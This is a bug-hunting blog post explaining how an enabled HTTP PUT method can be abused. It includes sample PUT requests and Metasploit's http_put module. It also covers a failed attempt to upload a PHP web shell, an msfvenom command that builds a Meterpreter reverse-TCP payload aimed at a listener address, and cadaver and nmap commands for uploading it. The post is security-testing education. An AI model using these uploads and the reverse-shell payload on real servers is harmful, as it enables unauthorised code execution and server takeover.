# HTTP PUT Method Exploit
Hello Hackers, Hope you are well !!
Today I'll talk about one of the most basic web attacks that recently faced me while doing bug hunting at private program which is exploiting enabled HTTP PUT Method.
## What is PUT?
The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.
### Syntax
```
PUT /new.html HTTP/1.1
```
### Example
#### Request
```
PUT /new.html HTTP/1.1
Host: example.com
Content-type: text/html
Content-length: 16
New File
```
#### Responses
If the target resource does not have a current representation and the `PUT` request successfully creates one, then the origin server must inform the user agent by sending a [`201`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/201) (`Created`) response.
```
HTTP/1.1 201 Created
Content-Location: /new.html
```
If the target resource does have a current representation and that representation is successfully modified in accordance with the state of the enclosed representation, then the origin server must send either a [`200`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200) (`OK`) or a [`204`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/204) (`No Content`) response to indicate successful completion of the request.
```
HTTP/1.1 204 No Content
Content-Location: /existing.html
```
### Real Life Scenario
while doing some recon on private program after gathering subdomains i always convert live.txt to IPs to run some port scanning using simple go script [h2i ](https://github.com/cybercdh/h2i)
since this program have a small scope i got some few IPs, in this situation i prefer using Nmap on masscan.
after few minutes i got very interesting result which was something like this.
without wasting any time i quickly opened metasploit to check if PUT method allowing uploading or creating any files in this subdomain.
### Exploit using Metasploit
create some test txt file to try uploading it to web server
by using **`auxiliary/scanner/http/http_put`** module on metasploit we can scan http put method
after visiting this path on vulnerable domain we can notice that the injection worked fine.
### Exploit with Burpsuit
As we all knows [BurpSuite ](https://portswigger.net/burp)is one of the most popular proxy intercepting tool through which you can easily analyze all kind of GET and POST requests.
*Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Security. The important tools inside* [*BurpSuite* ](https://portswigger.net/burp)*are HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.*
by intercepting GET request to and change it to PUT, we can create files & and add any content to it.
send Get request to this newly created file we can see that it\`s also created successfully.
⭐ **Golden TIP:** "*always try to escalate*". with that being said, i tried to get Remote Code Execution by creating some malicious php code in this file.
```
```
attempt to execute any command with injected parameter `cmd` but got nothing back.
Tried many ways to get commands runs but no luck 😥 the file is always reflecting it\`s content without execute any command.
### Exploit With Cadaver & Metasploit Framework
i\`ve tried to upload PHP malicious file which we’ll generate with the help of [msfvenom ](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)command.
`msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php`
Now run Cadaver tool which is already installed in every Kali Linux machine. Cadaver is a command line tool that support uploading and downloading of a files on webdav.
To run Cadaver, the command is:
`cadaver http://target.com/`
If all is good till now we can upload the **shell.php** file which you’ve created with msfvenom.
but i do not know why it did\`t work with me ¯\\\_(ツ)\_/¯
Anyways when you face this situation you can upload shell via [metasploit like above step](#exploit-using-metasploit) or you can use Nmap script to upload it with this command:
`nmap -p 80 target.com –-script http-put –-script-args http-put.url='strik3r_nmap.php",http-put.file="/root/shell.php'`
> Thanks For Reading